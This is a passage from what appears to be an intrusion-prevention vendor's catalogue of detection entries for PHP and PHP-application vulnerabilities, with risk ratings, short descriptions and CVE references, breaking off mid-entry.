https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24949

PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-992-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

Improper parsing of GIF files causes an out of bounds read vulnerability in PHP. A successful exploit allows potentially sensitive information to be disclosed.

Situation:

File-GIF_PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read

References:

CVE-2017-7890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7890

Php-Group-Php-Zip-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1618-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

A heap buffer overflow vulnerability exists in PHP. The vulnerability is due to an integer overflow in the libzip component of PHP and can be used to write beyond the end of a heap buffer. A remote attacker can exploit the vulnerability by sending a crafted ZIP archive to a web application running a vulnerable version of PHP. A successful attack will result in remote code execution under the context of the service running PHP.

Situation:

File-Zip_Php-Group-Php-Zip-Integer-Overflow

References:

CVE-2015-2331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331

Php-Htmlspecialchars-Htmlentities-Buffer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-443-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in PHP. The vulnerability is due to an error while processing numeric entities by the htmlspecialchars and htmlentities PHP functions. A remote attacker could exploit this vulnerability by sending a malicious request to a web application that uses these functions. A successful attack attempt could result in the execution of arbitrary code in the security context of the HTTP service, which is normally user "nobody" for Apache on Linux. Configurations where the HTTP server runs as root or SYSTEM are uncommon.

Situation:

HTTP_CRL-Php-Htmlspecialchars-Htmlentities-Buffer-Overflow

References:

BID-51860
http://www.securityfocus.com/bid/51860

PHP-HTTP-Multipart-Form-Data-Denial-Of-Service

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-669-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Resource Starvation

Description:

A resource exhaustion vulnerability exists in PHP. This vulnerability is due to PHP incorrectly handling HTTP multipart/form-data. A remote attacker can exploit this vulnerability by sending multiple crafted requests to a vulnerable server application running PHP. Successful exploitation could lead to consumption of large amounts of system resources, resulting in a denial of service condition.

Situation:

HTTP_CSH-PHP-HTTP-Multipart-Form-Data-Denial-Of-Service

References:

CVE-2015-4024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024

BID-74903
http://www.securityfocus.com/bid/74903

Php-HTTP-POST-File-Upload-Buffer-Overflow

About this vulnerability:

Buffer overflow in PHP multipart/form-data HTTP POST request handling

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

PHP versions prior to 4.2.0 are vulnerable to a buffer overflow vulnerability in the handling of file uploads. By using the HTTP POST method to upload a PHP form containing specially-crafted MIME-encoded data, a remote attacker can overflow a buffer and execute arbitrary code on the Web server with elevated privileges.

Situation:

HTTP_CS-Php-POST-File-Upload-Buffer-Overflow

References:

CVE-2002-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0081

BID-4183
http://www.securityfocus.com/bid/4183

OSVDB-720
http://www.osvdb.org/720

PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-1054-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

Improper parsing of HTTP responses causes a stack buffer overflow vulnerability in PHP. A successful exploit allows a remote attacker to execute arbitrary code with the privileges of the PHP process.

Situation:

HTTP_SHS-PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow

References:

CVE-2018-7584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7584

PHP-IMAP-Open-RCE

About this vulnerability:

A vulnerability in University of Washington IMAP

Risk:

High

First detected in:

sgpkg-ips-1323-5242

Last changed:

sgpkg-ips-1323-5242

Platform:

Generic

Software:

University of Washington imapd

Type:

Input Validation

Description:

There exists a vulnerability in University of Washington IMAP Toolkit 2007f which allows remote attackers to execute arbitrary code due to the lack of input validation to the hostname parameter.

Situation:

HTTP_CRL-PHP-IMAP-Open-RCE

References:

CVE-2018-19518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518

Php-LDAP-Denial-Of-Service

About this vulnerability:

A vulnerability in PHP

Risk:

High

First detected in:

sgpkg-ips-1130-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in PHP. The vulnerability is due to a NULL pointer dereference in ldap_get_dn() when performing LDAP queries. A remote attacker that runs a malicious LDAP server or a man-in-the-middle attacker could exploit this vulnerability by sending maliciously crafted data to the PHP application. Successful exploitation of this vulnerability could lead to denial of service.

Situation:

LDAP_SS-Php-LDAP-Denial-Of-Service

References:

CVE-2018-10548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10548

Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-572-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

An out-of-bound memory access vulnerability exists in PHP Libmagic. The vulnerability is due to the way the file utility determines the type of Portable Executable (PE) format files. A remote attacker can exploit this flaw by uploading a malicious PE file to a vulnerable server. Successful exploitation could allow the attacker to execute arbitrary code, or result in a denial of service condition.

Situation:

HTTP_CS-Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access

References:

CVE-2014-2270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270

OSVDB-104081
http://www.osvdb.org/104081

Php-Memory-Limit-Code-Execution-Vulnerability

About this vulnerability:

Arbitrary code execution vulnerability in PHP memory_limit

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

There is a vulnerability in the way PHP aborts from a memory allocation which exceeds the memory limit. This operation is unsafe during the allocation and initialization of hash table elements. It is possible for an attacker to take control of a memory pointer and execute arbitrary code on the target. When PHP reaches its memory limit constraint, it will start a request shutdown. If logging is enabled, an error message will be sent to the error log file. If remote logging is enabled, error messages will be sent in the payload response of the PHP script. The HTTP request is terminated. If this has occurred during the allocation of hash table elements, certain members of these elements may be incorrectly initialized. If the attacker has gained control of the destructor function pointer, he may be able to execute arbitrary code on the target with the privileges of the Apache server. The behaviour of the target is dependent on the malicious code.

Situation:

HTTP_CS-Php-Memory_Limit-Vulnerability
HTTP_SHS-Vulnerable-Php-4.3.7

References:

CVE-2004-0594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594

BID-10725
http://www.securityfocus.com/bid/10725

OSVDB-7870
http://www.osvdb.org/7870

Php-Nuke-Referer-SQL-Injection

About this vulnerability:

SQL Injection Attack Tool

Risk:

High

First detected in:

sgpkg-ips-344-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP-Nuke

Type:

SQL Injection

Description:

SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header.

Situation:

HTTP_CSH-SQL-Injection-In-Referer-Header-Field

References:

CVE-2007-1061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1061

BID-22638
http://www.securityfocus.com/bid/22638

OSVDB-33316
http://www.osvdb.org/33316

Php-Nuke-SQL-Injection

About this vulnerability:	A vulnerability in PHP-Nuke
Risk:	High
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP-Nuke
Type:	SQL Injection
Description:	PHP-Nuke is an Internet/Intranet Content Management System (CMS) written in PHP. There are multiple SQL injection vulnerabilities in its code that allow a remote attacker to execute SQL statements of his choice.
Situation:	HTTP_CSU-Php-Nuke-SQL-Injection

Php-OLE-File-Handling-Infinite-Loop

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Infinite Loop

Description:

A denial of service vulnerability has been reported in PHP. It is due to an error in the FileInfo module while handling nelements in the processing of CDF files. A remote attacker can exploit the vulnerability by sending crafted CDF files to a web application running a vulnerable version of PHP. A successful attack will result in an infinite loop, which can cause a denial of service condition.

Situation:

HTTP_CS-Php-OLE-File-Handling-Infinite-Loop
File-OLE_Php-OLE-File-Handling-Infinite-Loop

References:

CVE-2014-0238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238

PHP-Payloads-Injected-In-PNG-Image

About this vulnerability:	A suspicious PNG image containing PHP payloads detected
Risk:	High
First detected in:	sgpkg-ips-1846-5242
Last changed:	sgpkg-ips-1846-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	This fingerprint detects PNG images that contain PHP payloads. Such images could be used to perform remote code execution on vulnerable PHP applications.
Situation:	File-PNG_PHP-Payloads-Injected-In-PNG-Image

Php-PECL-Zip-URL-Wrapper-Buffer-Overflow

About this vulnerability:	Buffer Overflow Vulnerability in PHP Extension Community Library Zip management
Risk:	Moderate
First detected in:	sgpkg-ips-560-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Buffer Overflow
Description:	A vulnerability exists in older versions of PHP and in PHP Extension Community Library (PECL) zip management extension which could be exploited by remote attackers to execute code on a vulnerable system. The vulnerability is due to a boundary error in the processing of excessively long "zip://" URL wrappers. Remote attackers could exploit this vulnerability by persuading unsuspecting users to visit a site that uses a PHP application to open specially crafted "zip://" URLs. Successful exploitation would cause a stack based buffer overflow that could cause a denial of service, or allow the attacker to execute code on the vulnerable system.
Situation:	File-Text_Php-PECL-Zip-URL-Wrapper-Buffer-Overflow

PHP-Phar-404-Page-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-1062-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Input Validation

Description:

Improper sanitation of .phar file names when generating 404 response pages for missing files causes a cross-site scripting vulnerability in PHP. A successful exploit allows an attacker to run arbitrary code in an user's web browser.

Situation:

HTTP_CRL-PHP-Phar-404-Page-Reflected-Cross-Site-Scripting

References:

CVE-2018-5712
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5712

Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-855-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in PHP. A remote attacker could use this to generate a denial of service condition on the target system.

Situation:

File-Text_Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow

References:

CVE-2016-10159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10159

Php-Phar_Parse_Tarfile-Method-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-655-5211

Last changed:

sgpkg-ips-1719-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in PHP. The vulnerability is due to an issue with the parsing of TAR files by phar_parse_tarfile(). A remote attacker can exploit the vulnerability by sending crafted data to a web application running a vulnerable version of PHP. Successful exploitation could lead to the disclosure of sensitive information from the server.

Situation:

File-Binary_Php-Phar_Parse_Tarfile-Method-Integer-Overflow

References:

CVE-2015-4021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021

PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-662-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in PHP. The vulnerability is due to improper bounds checking when handling .tar, .phar or .zip archive in the phar_set_inode function. A remote unauthenticated attacker can exploit this vulnerability by providing a crafted .tar, .phar or .zip archive the the vulnerable application. Successful exploitation could lead to execution of arbitrary code under the security context of the process.

Situation:

File-Binary_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
File-Text_PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow

References:

CVE-2015-3329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3329

BID-74240
http://www.securityfocus.com/bid/74240

Php-Phpinfo-request

About this vulnerability:	Request for phpinfo.php detected
Risk:	Low
First detected in:	sgpkg-ips-554-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Insecure Configuration
Description:	Request for phpinfo.php was detected. It is generally not advised to serve web-pages disclosing server information to the public.
Situation:	HTTP_CSU-Php-Phpinfo-request File-Text_PHP-Test-Page-Transfer

Php-Php_parserr-DNS-Txt-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

A heap buffer vulnerability exists in the php_parserr() function in PHP. The vulnerability is due to an error in parsing malformed DNS TXT records. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.

Situation:

DNS-UDP_Multiple-Vendors-DNS-Txt-Record-Parsing-Buffer-Overflow

References:

CVE-2014-4049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049

OSVDB-107994
http://www.osvdb.org/107994

PHP-Php_Register_Variable_ex-Function-Code-Execution

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

There is a memory corruption vulnerability in PHP. The vulnerability is due to improper handling of an error condition in function php_register_variable_ex when the number of variables exceeds max_input_vars. When too many variables are encountered, the vulnerable PHP module is allowed to continue executing and might corrupt memory through an invalid pointer. A remote attacker could exploit this vulnerability in web applications that use this functionality, by sending a malicious request. A successful attack could result in arbitrary code execution in the context of the HTTP service, normally nobody for Apache on Linux. Configurations where the HTTP server with PHP runs as root or SYSTEM are uncommon, though possible.

Situation:

HTTP_CS-Large-Number-Of-Parameters-In-POST-Request

References:

CVE-2012-0830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830

BID-51830
http://www.securityfocus.com/bid/51830

OSVDB-78819
http://www.osvdb.org/78819

Php-Probe-Script

About this vulnerability:	Probe script
Risk:	High
First detected in:	sgpkg-ips-369-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Any Software
Type:	Post Compromise Behaviour
Description:	PHP probe is a script that is often used to determine wheter an exploitation was successful or not. If such scripts are detected from a network, especially if the file is being downloaded to a web server may indicate an ongoing attack.
Situation:	HTTP_SS-Php-Probe-Script File-Text_Php-Probe-Script

Php-Quot-Print-Encode-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Buffer Overflow

Description:

There is a heap buffer vulnerability in php_quot_print_encode() function in PHP. The vulnerability is due to an error in parsing strings passed to the function. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.

Situation:

HTTP_CRL-Php-Quot-Print-Encode-Heap-Buffer-Overflow

References:

CVE-2013-2110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2110

BID-60411
http://www.securityfocus.com/bid/60411

OSVDB-94063
http://www.osvdb.org/94063

PHP-Remote-File-Inclusion

About this vulnerability:	An attempt to exploit a remote file inclusion vulnerability detected
Risk:	High
First detected in:	sgpkg-ips-1054-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Remote file inclusion vulnerability could allow a remote attacker to include a file to be executed in a target server. This could lead to system compromise of the target server.
Situation:	HTTP_CSU-PHP-Remote-File-Inclusion

Php-Reserved-Variable-In-Request

About this vulnerability:	Reserved variable in HTTP request
Risk:	High
First detected in:	sgpkg-ips-199-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Input Validation
Description:	PHP is a scripting language used in web servers for server-side applications. The language defines a set of reserved variables. Use of these variables in a request may indicate an exploit attempt.
Situation:	HTTP_CRL-Php-Reserved-Server-Variable-In-Request

Php-Script-External-Command-Execution

About this vulnerability:	PHP script executes external commands
Risk:	Moderate
First detected in:	sgpkg-ips-156-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Code Injection
Description:	PHP is a scripting language used especially on web servers. The language allows execution of external commands and many automated exploit tools against various PHP vulnerabilities attempt to download scripts that execute external tools.
Situation:	HTTP_SS-Php-Script-External-Command-Execution-Download File-Text_Php-Script-External-Command-Execution-Download-2 File-Text_Php-Script-External-Command-Execution-Download

Php-Suspicious-Include-Parameter

About this vulnerability:	Vulnerability in various PHP scripts
Risk:	High
First detected in:	sgpkg-ips-156-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	PHP
Type:	Input Validation
Description:	There is a common vulnerability in various scripts written with PHP scripting language where the parameters passed in the URI are not properly sanitized allowing remote file inclusion and execution in the context of the web server.
Situation:	HTTP_CSU-Php-Suspicious-Path-Parameter HTTP_CSU-Php-Suspicious-Include-Parameter HTTP_CSU-Php-Suspicious-Root-Parameter HTTP_CSU-Php-Suspicious-Go-Parameter HTTP_CSU-Php-Suspicious-Site-Parameter HTTP_CSU-Php-Suspicious-Basedir-Parameter HTTP_CSU-Php-Suspicious-Absolute-Path-Parameter HTTP_CSU-Php-Suspicious-Document-Root-Parameter HTTP_CSU-Php-Suspicious-External-Parameter-Reference HTTP_CSU-Server-Side-Scripting-Suspicious-External-Parameter-Reference HTTP_CSU-Server-Side-Scripting-Suspicious-External-Text-File-Reference HTTP_CSU-Php-Injection-Attack

Php-Tar-File-Parsing-Uninitialized-Reference

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A vulnerability in PHP, versions before 5.6.18 and 7.x before 7.0.3, which allows remote attackers to cause a denial of service condition, or possibly execute arbitrary code, via a crafted tar file.

Situation:

File-Binary_Php-Tar-File-Parsing-Uninitialized-Reference

References:

CVE-2016-4343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4343

Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A memory corruption vulnerability exists in PHP. The vulnerability is due to type confusion in the unserialize() function for SPL ArrayObject and SPLObjectStorage. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.

Situation:

HTTP_CRL-Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption

References:

CVE-2014-3515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515

OSVDB-108462
http://www.osvdb.org/108462

Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

High

First detected in:

sgpkg-ips-534-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

A heap memory corruption vulnerability exists in xml_parse_into_struct() function in PHP. The vulnerability is due to an error in parsing XML strings passed to the function. An attacker can exploit this vulnerability if the application uses the vulnerable function. A successful attack can allow arbitrary code execution in the context of the PHP application. An unsuccessful attack will result in a denial of service condition.

Situation:

HTTP_CRL-Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption

References:

CVE-2013-4113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113

BID-61128
http://www.securityfocus.com/bid/61128

OSVDB-95152
http://www.osvdb.org/95152

Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution

About this vulnerability:

A vulnerability in PHP

Risk:

High

First detected in:

sgpkg-ips-859-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Malfunction

Description:

There exists an arbitrary code execution vulnerability in PHP.

Situation:

File-Text_Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution

References:

CVE-2017-5340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5340

BID-95371
http://www.securityfocus.com/bid/95371

PHP-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow

About this vulnerability:

A vulnerability in PHP Group PHP

Risk:

Moderate

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Integer Overflow

Description:

An error in reading zip files with the getFromIndex() and getFromName() of PHP ZipArchiver, can cause a heap buffer overflow. A crafted ZIP file can be used to gain code execution privileges on the target.

Situation:

File-Zip_PPH-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow

References:

CVE-2016-3078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3078

Phpbb-Sessions-Php-Autologinid-Authentication-Bypass

About this vulnerability:

Authentication bypass vulnerability in Phpbb sessions.php

Risk:

High

First detected in:

sgpkg-ips-48-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PhpBB

Type:

Malfunction

Description:

Phpbb Web bulletin board software contains a flaw in sessions.php that allows unauthorized users to gain administrative privileges due to a failure of sanitizing certain script variables. A remote attacker could set a specially crafted cookie pointing to the known administrator id to bypass the authentication and to execute arbitrary commands on the vulnerable system.

Situation:

HTTP_CSU-Phpbb-Sessions-Php-Autologinid-Authentication-Bypass

References:

CVE-2005-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0614

BID-12678
http://www.securityfocus.com/bid/12678

OSVDB-14242
http://www.osvdb.org/14242

PhpFileManager-Cmd-Parameter-Command-Execution

About this vulnerability:	A vulnerability in phpFileManager
Risk:	High
First detected in:	sgpkg-ips-670-5211
Last changed:	sgpkg-ips-1607-5242
Platform:	Generic
Software:	phpFileManager
Type:	Input Validation
Description:	A remote command execution vulnerability exists in phpFileManager. The vulnerability is due to a design weakness when handling HTTP requests with "action" parameter set to 6. A remote user can exploit this vulnerability by injecting arbitrary command in the "cmd" parameter. Successful exploitation will results in arbitrary code execution on the target system under the security context of the affected web server.
Situation:	HTTP_CRL-PhpFileManager-Cmd-Parameter-Command-Execution

Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in phpGACL

Risk:

Moderate

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

phpGACL

Type:

Input Validation

Description:

Insufficient validation of the 'action' parameter in HTTP requests causes a cross-site scripting vulnerability in phpGACL. A successful exploit allows an attacker to run scripts in a user's browser.

Situation:

HTTP_CSU-Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting

References:

CVE-2020-13562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13562

PhpGedView-PGV-Base-Directory-Php-Injection

About this vulnerability:

PHP code injection vulnerability in PhpGedView

Risk:

High

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Unix

Software:

PhpGedView

Type:

PHP Injection

Description:

PHPGEDVIEW up to version 2.65.1 allows a remote attacker to point the PGV_BASE_DIRECTORY parameter to a remote Web server that can contain malicious code.

References:

CVE-2004-0030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030

BID-9368
http://www.securityfocus.com/bid/9368

OSVDB-3343
http://www.osvdb.org/3343

phpLDAPadmin-Remote-PHP-Code-Injection

About this vulnerability:

A phpLDAPadmin Remote PHP Code Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpLDAPadmin

Type:

PHP Injection

Description:

A vulnerability in phpLDAPadmin, versions 1.2.x before 1.2.2, that allows remote attackers to execute arbitrary PHP code via the orderby parameter in a query_engine action to cmd.php.

Situation:

HTTP_CRL-phpLDAPadmin-Remote-PHP-Code-Injection

References:

CVE-2011-4075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4075

BID-50331
http://www.securityfocus.com/bid/50331

OSVDB-76594
http://www.osvdb.org/76594

PHPMailer-Mail-Escapeshellarg-Command-Injection

About this vulnerability:

A vulnerability in PHPMailer

Risk:

High

First detected in:

sgpkg-ips-859-5242

Last changed:

sgpkg-ips-1654-5242

Platform:

Generic

Software:

PHPMailer

Type:

Input Validation

Description:

There exists a command injection vulnerability in PHPMailer library package. A remote, unauthenticated attacker can use this to execute arbitrary commands on the affected system.

Situation:

HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection-2
HTTP_CRL-PHPMailer-Mail-Escapeshellarg-Command-Injection

References:

CVE-2016-10045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045

PHPMailer-Mail-Sender-Command-Injection

About this vulnerability:

A vulnerability in PHPMailer libphp-phpmailer

Risk:

Moderate

First detected in:

sgpkg-ips-864-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHPMailer

Type:

Input Validation

Description:

Insufficient sanitization of request parameters causes a command injection vulnerability in PHPMailer libphp-phpmailer. A successful exploitation allows an attacker to execute code with the server process privileges.

Situation:

HTTP_CRL-PHPMailer-Mail-Sender-Command-Injection

References:

CVE-2016-10033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033

PHPMoAdmin-Remote-Code-Execution

About this vulnerability:

PHPMoAdmin Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-685-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHPMoAdmin

Type:

PHP Injection

Description:

A vulnerability in PHPMoAdmin 1.1.2 which allows remote attackers to execute arbitrary commands, via shell metacharacters, in the object parameter of the saveObject function in moadmin.php.

Situation:

HTTP_CRL-PHPMoAdmin-Remote-Code-Execution

References:

CVE-2015-2208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2208

Phpmyadmin-Index.php-Local-File-Inclusion

About this vulnerability:

A vulnerability in phpMyAdmin Devel Team phpMyAdmin

Risk:

Moderate

First detected in:

sgpkg-ips-1088-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Input Validation

Description:

There has been reported a local file inclusion vulnerability in phpMyAdmin. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary code execution.

Situation:

HTTP_CRL-Phpmyadmin-Index.php-Local-File-Inclusion

References:

CVE-2018-12613
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613

Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in phpMyAdmin Devel Team phpMyAdmin

Risk:

Moderate

First detected in:

sgpkg-ips-1123-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Input Validation

Description:

There has been reported a stored cross-site scripting vulnerability in phpMyAdmin. This vulnerability can be exploited by an authenticated attacker. Successful exploitation results in the execution of arbitrary script code in the browser.

Situation:

HTTP_CRL-Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting

References:

CVE-2018-19970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19970

Phpmyadmin-Preg_Replace-Function-Code-Injection

About this vulnerability:

A vulnerability in phpMyAdmin Devel Team phpMyAdmin

Risk:

Moderate

First detected in:

sgpkg-ips-523-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

phpMyAdmin

Type:

Input Validation

Description:

A vulnerability has been reported in phpMyAdmin, a web-based administration console for MySQL servers. This vulnerability could allow remote attackers to execute arbitrary code on the vulnerable system. The vulnerability is due to an input validation error when handling queries of the types replace_prefix_tbl or copy_tbl_change_prefix to db_structure.php. A remote, authenticated attacker could exploit this vulnerability by sending a malicious POST request. Successful exploitation may lead to arbitrary PHP code execution in the security context of the HTTP server.

Situation:

HTTP_CRL-Phpmyadmin-Preg_Replace-Function-Code-Injection

References:

CVE-2013-3238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3238

OSVDB-92793
http://www.osvdb.org/92793

Phpmyadmin-Searchcontroller-SQL-Injection

About this vulnerability:

